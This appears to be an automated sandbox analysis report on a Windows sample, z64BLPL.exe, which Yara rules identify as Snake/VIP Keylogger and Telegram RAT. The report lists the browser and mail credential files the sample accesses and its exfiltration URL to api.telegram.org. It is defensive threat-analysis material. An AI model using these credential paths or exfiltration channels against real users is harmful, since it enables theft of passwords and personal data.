Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599765 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599636 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599531 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599421 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599312 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599203 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 599093 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598984 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598875 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598765 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598656 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598546 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598437 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598328 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598218 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 598109 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597996 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597888 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597741 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597637 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597531 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597417 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597312 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 597093 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596547 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596437 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596328 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596217 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596109 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 596000 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595890 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595672 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595547 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595437 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595328 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595218 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 595109 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594993 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594890 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594781 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594671 Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Thread delayed: delay time: 594562 Jump to behavior
Source: z64BLPL.exe, 00000000.00000002.4120472413.0000000000DA2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllCult
Source: C:\Users\user\Desktop\z64BLPL.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\z64BLPL.exe Code function: 0_2_066996C8 LdrInitializeThunk, 0_2_066996C8
Enables debug privileges
Source: C:\Users\user\Desktop\z64BLPL.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Memory allocated: page read and write | page guard Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\z64BLPL.exe Queries volume information: C:\Users\user\Desktop\z64BLPL.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: z64BLPL.exe, type: SAMPLE
Source: Yara match File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: z64BLPL.exe, type: SAMPLE
Source: Yara match File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\z64BLPL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\z64BLPL.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\z64BLPL.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: z64BLPL.exe, type: SAMPLE
Source: Yara match File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: z64BLPL.exe, type: SAMPLE
Source: Yara match File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: z64BLPL.exe, type: SAMPLE
Source: Yara match File source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z64BLPL.exe PID: 7268, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
193.122.6.168
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false
192.250.231.25
 mail.electradubai.com United States
36454 CNSV-LLCUS true

Contacted Domains

Name IP Active
mail.electradubai.com 192.250.231.25 true
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 193.122.6.168 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • Avira URL Cloud: safe
 unknown
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown